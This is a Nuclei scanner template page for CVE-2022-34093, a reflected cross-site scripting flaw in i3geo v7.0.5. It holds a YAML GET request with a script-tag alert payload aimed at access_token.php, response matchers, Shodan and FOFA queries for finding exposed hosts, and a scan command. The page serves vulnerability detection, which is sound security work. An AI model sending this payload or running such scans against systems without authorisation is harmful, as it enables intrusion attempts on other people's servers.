Skip to content
Nuclei Templates

Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting

ID: CVE-2022-34093

Severity: medium

Author: r3Y3r53

Tags: cve,cve2022,i3geo,xss,softwarepublico

Description

Section titled “Description”

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-34093


info:
  name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34093
    - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
    - https://owasp.org/www-community/attacks/xss/
    - https://softwarepublico.gov.br/social/i3geo
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-34093
    cwe-id: CWE-79
    epss-score: 0.00258
    epss-percentile: 0.65535
    cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: softwarepublico
    product: i3geo
    shodan-query: http.html:"i3geo"
    fofa-query: body="i3geo"
  tags: cve,cve2022,i3geo,xss,softwarepublico


http:
  - method: GET
    path:
      - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
        condition: and
# digest: 490a0046304402201a91839f5b5f9c47372ae10a8fc57c145d553ed22a34cb6313dcc12ee9248d5202201907adfed91a535e7604e4ce0ee0994c0524dcd26478304782909be20aeb02a5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-34093.yaml"

View on Github